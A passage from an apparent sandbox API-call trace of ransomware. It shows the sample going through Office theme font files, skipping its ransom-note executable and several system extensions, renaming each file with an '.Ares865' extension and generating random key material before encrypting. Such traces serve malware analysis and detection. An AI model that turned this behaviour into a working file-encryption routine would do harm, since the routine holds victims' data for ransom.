Fonts\\Opulent.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\opulent.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.662] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3613) returned 1 [0073.662] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.663] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.663] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.667] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.668] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.668] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.669] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8885600, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf8885600, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oriel.xml", cAlternateFileName="")) returned 1 [0073.669] lstrcmpiW (lpString1="Oriel.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.669] lstrcmpiW (lpString1="Oriel.xml", lpString2="aoldtz.exe") returned 1 [0073.669] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Oriel.xml" | out: lpString1="Oriel.xml") returned="Oriel.xml" [0073.669] lstrlenW (lpString="Oriel.xml") returned 9 [0073.669] lstrlenW (lpString="Ares865") returned 7 [0073.669] lstrcmpiW (lpString1="iel.xml", lpString2="Ares865") returned 1 [0073.669] lstrlenW (lpString=".dll") returned 4 [0073.669] lstrcmpiW (lpString1="Oriel.xml", lpString2=".dll") returned 1 [0073.669] lstrlenW (lpString=".lnk") returned 4 [0073.669] lstrcmpiW (lpString1="Oriel.xml", lpString2=".lnk") returned 1 [0073.669] lstrlenW (lpString=".ini") returned 4 [0073.669] lstrcmpiW (lpString1="Oriel.xml", lpString2=".ini") returned 1 [0073.669] lstrlenW (lpString=".sys") returned 4 [0073.669] lstrcmpiW (lpString1="Oriel.xml", lpString2=".sys") returned 1 [0073.669] lstrlenW (lpString="Oriel.xml") returned 9 [0073.669] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml.Ares865") returned 82 [0073.669] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\oriel.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\oriel.xml.ares865"), dwFlags=0x1) returned 1 [0073.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\oriel.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.694] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3674) returned 1 [0073.695] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.696] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.696] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.698] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.699] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.699] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.700] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9b98300, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9b98300, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xeed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Origin.xml", cAlternateFileName="")) returned 1 [0073.700] lstrcmpiW (lpString1="Origin.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.700] lstrcmpiW (lpString1="Origin.xml", lpString2="aoldtz.exe") returned 1 [0073.700] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Origin.xml" | out: lpString1="Origin.xml") returned="Origin.xml" [0073.700] lstrlenW (lpString="Origin.xml") returned 10 [0073.700] lstrlenW (lpString="Ares865") returned 7 [0073.700] lstrcmpiW (lpString1="gin.xml", lpString2="Ares865") returned 1 [0073.700] lstrlenW (lpString=".dll") returned 4 [0073.700] lstrcmpiW (lpString1="Origin.xml", lpString2=".dll") returned 1 [0073.700] lstrlenW (lpString=".lnk") returned 4 [0073.700] lstrcmpiW (lpString1="Origin.xml", lpString2=".lnk") returned 1 [0073.700] lstrlenW (lpString=".ini") returned 4 [0073.700] lstrcmpiW (lpString1="Origin.xml", lpString2=".ini") returned 1 [0073.700] lstrlenW (lpString=".sys") returned 4 [0073.700] lstrcmpiW (lpString1="Origin.xml", lpString2=".sys") returned 1 [0073.700] lstrlenW (lpString="Origin.xml") returned 10 [0073.700] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml.Ares865") returned 83 [0073.700] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\origin.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\origin.xml.ares865"), dwFlags=0x1) returned 1 [0073.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\origin.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.701] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3821) returned 1 [0073.701] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.702] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.702] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.705] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.705] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.705] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.706] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaeab000, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfaeab000, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Paper.xml", cAlternateFileName="")) returned 1 [0073.706] lstrcmpiW (lpString1="Paper.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.706] lstrcmpiW (lpString1="Paper.xml", lpString2="aoldtz.exe") returned 1 [0073.706] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Paper.xml" | out: lpString1="Paper.xml") returned="Paper.xml" [0073.706] lstrlenW (lpString="Paper.xml") returned 9 [0073.706] lstrlenW (lpString="Ares865") returned 7 [0073.706] lstrcmpiW (lpString1="per.xml", lpString2="Ares865") returned 1 [0073.706] lstrlenW (lpString=".dll") returned 4 [0073.706] lstrcmpiW (lpString1="Paper.xml", lpString2=".dll") returned 1 [0073.706] lstrlenW (lpString=".lnk") returned 4 [0073.706] lstrcmpiW (lpString1="Paper.xml", lpString2=".lnk") returned 1 [0073.706] lstrlenW (lpString=".ini") returned 4 [0073.706] lstrcmpiW (lpString1="Paper.xml", lpString2=".ini") returned 1 [0073.706] lstrlenW (lpString=".sys") returned 4 [0073.706] lstrcmpiW (lpString1="Paper.xml", lpString2=".sys") returned 1 [0073.706] lstrlenW (lpString="Paper.xml") returned 9 [0073.707] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml.Ares865") returned 82 [0073.707] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\paper.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\paper.xml.ares865"), dwFlags=0x1) returned 1 [0073.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\paper.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.707] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3628) returned 1 [0073.708] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.708] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.708] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.710] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.711] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.711] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.712] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8079f00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8079f00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe0f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Perspective.xml", cAlternateFileName="PERSPE~1.XML")) returned 1 [0073.712] lstrcmpiW (lpString1="Perspective.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.712] lstrcmpiW (lpString1="Perspective.xml", lpString2="aoldtz.exe") returned 1 [0073.712] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Perspective.xml" | out: lpString1="Perspective.xml") returned="Perspective.xml" [0073.712] lstrlenW (lpString="Perspective.xml") returned 15 [0073.712] lstrlenW (lpString="Ares865") returned 7 [0073.712] lstrcmpiW (lpString1="ive.xml", lpString2="Ares865") returned 1 [0073.712] lstrlenW (lpString=".dll") returned 4 [0073.712] lstrcmpiW (lpString1="Perspective.xml", lpString2=".dll") returned 1 [0073.712] lstrlenW (lpString=".lnk") returned 4 [0073.712] lstrcmpiW (lpString1="Perspective.xml", lpString2=".lnk") returned 1 [0073.712] lstrlenW (lpString=".ini") returned 4 [0073.712] lstrcmpiW (lpString1="Perspective.xml", lpString2=".ini") returned 1 [0073.712] lstrlenW (lpString=".sys") returned 4 [0073.712] lstrcmpiW (lpString1="Perspective.xml", lpString2=".sys") returned 1 [0073.712] lstrlenW (lpString="Perspective.xml") returned 15 [0073.712] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml.Ares865") returned 88 [0073.712] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\perspective.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\perspective.xml.ares865"), dwFlags=0x1) returned 1 [0073.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\perspective.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.713] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3599) returned 1 [0073.713] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.714] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.714] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.716] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.717] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.717] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.717] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x938cc00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x938cc00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pushpin.xml", cAlternateFileName="")) returned 1 [0073.717] lstrcmpiW (lpString1="Pushpin.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.717] lstrcmpiW (lpString1="Pushpin.xml", lpString2="aoldtz.exe") returned 1 [0073.717] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Pushpin.xml" | out: lpString1="Pushpin.xml") returned="Pushpin.xml" [0073.717] lstrlenW (lpString="Pushpin.xml") returned 11 [0073.717] lstrlenW (lpString="Ares865") returned 7 [0073.717] lstrcmpiW (lpString1="pin.xml", lpString2="Ares865") returned 1 [0073.717] lstrlenW (lpString=".dll") returned 4 [0073.717] lstrcmpiW (lpString1="Pushpin.xml", lpString2=".dll") returned 1 [0073.717] lstrlenW (lpString=".lnk") returned 4 [0073.717] lstrcmpiW (lpString1="Pushpin.xml", lpString2=".lnk") returned 1 [0073.718] lstrlenW (lpString=".ini") returned 4 [0073.718] lstrcmpiW (lpString1="Pushpin.xml", lpString2=".ini") returned 1 [0073.718] lstrlenW (lpString=".sys") returned 4 [0073.718] lstrcmpiW (lpString1="Pushpin.xml", lpString2=".sys") returned 1 [0073.718] lstrlenW (lpString="Pushpin.xml") returned 11 [0073.718] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml.Ares865") returned 84 [0073.718] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\pushpin.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\pushpin.xml.ares865"), dwFlags=0x1) returned 1 [0073.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\pushpin.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.719] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3711) returned 1 [0073.719] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.720] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.720] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.722] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.723] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.723] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.724] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b1a6f00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b1a6f00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Slipstream.xml", cAlternateFileName="SLIPST~1.XML")) returned 1 [0073.724] lstrcmpiW (lpString1="Slipstream.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.724] lstrcmpiW (lpString1="Slipstream.xml", lpString2="aoldtz.exe") returned 1 [0073.724] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Slipstream.xml" | out: lpString1="Slipstream.xml") returned="Slipstream.xml" [0073.724] lstrlenW (lpString="Slipstream.xml") returned 14 [0073.724] lstrlenW (lpString="Ares865") returned 7 [0073.724] lstrcmpiW (lpString1="eam.xml", lpString2="Ares865") returned 1 [0073.724] lstrlenW (lpString=".dll") returned 4 [0073.724] lstrcmpiW (lpString1="Slipstream.xml", lpString2=".dll") returned 1 [0073.724] lstrlenW (lpString=".lnk") returned 4 [0073.724] lstrcmpiW (lpString1="Slipstream.xml", lpString2=".lnk") returned 1 [0073.724] lstrlenW (lpString=".ini") returned 4 [0073.724] lstrcmpiW (lpString1="Slipstream.xml", lpString2=".ini") returned 1 [0073.724] lstrlenW (lpString=".sys") returned 4 [0073.724] lstrcmpiW (lpString1="Slipstream.xml", lpString2=".sys") returned 1 [0073.724] lstrlenW (lpString="Slipstream.xml") returned 14 [0073.724] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml.Ares865") returned 87 [0073.724] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\slipstream.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\slipstream.xml.ares865"), dwFlags=0x1) returned 1 [0073.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\slipstream.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.727] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3608) returned 1 [0073.727] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.728] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.728] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.731] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.731] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.731] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.732] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc1bdd00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc1bdd00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xee9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Solstice.xml", cAlternateFileName="")) returned 1 [0073.732] lstrcmpiW (lpString1="Solstice.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.732] lstrcmpiW (lpString1="Solstice.xml", lpString2="aoldtz.exe") returned 1 [0073.732] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Solstice.xml" | out: lpString1="Solstice.xml") returned="Solstice.xml" [0073.732] lstrlenW (lpString="Solstice.xml") returned 12 [0073.732] lstrlenW (lpString="Ares865") returned 7 [0073.732] lstrcmpiW (lpString1="ice.xml", lpString2="Ares865") returned 1 [0073.732] lstrlenW (lpString=".dll") returned 4 [0073.732] lstrcmpiW (lpString1="Solstice.xml", lpString2=".dll") returned 1 [0073.732] lstrlenW (lpString=".lnk") returned 4 [0073.732] lstrcmpiW (lpString1="Solstice.xml", lpString2=".lnk") returned 1 [0073.732] lstrlenW (lpString=".ini") returned 4 [0073.732] lstrcmpiW (lpString1="Solstice.xml", lpString2=".ini") returned 1 [0073.732] lstrlenW (lpString=".sys") returned 4 [0073.732] lstrcmpiW (lpString1="Solstice.xml", lpString2=".sys") returned 1 [0073.732] lstrlenW (lpString="Solstice.xml") returned 12 [0073.733] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml.Ares865") returned 85 [0073.733] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\solstice.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\solstice.xml.ares865"), dwFlags=0x1) returned 1 [0073.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\solstice.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.734] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3817) returned 1 [0073.734] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.735] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.735] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.739] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.740] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.740] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.740] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd4d0a00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd4d0a00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Technic.xml", cAlternateFileName="")) returned 1 [0073.740] lstrcmpiW (lpString1="Technic.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.740] lstrcmpiW (lpString1="Technic.xml", lpString2="aoldtz.exe") returned 1 [0073.740] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Technic.xml" | out: lpString1="Technic.xml") returned="Technic.xml" [0073.740] lstrlenW (lpString="Technic.xml") returned 11 [0073.741] lstrlenW (lpString="Ares865") returned 7 [0073.741] lstrcmpiW (lpString1="nic.xml", lpString2="Ares865") returned 1 [0073.741] 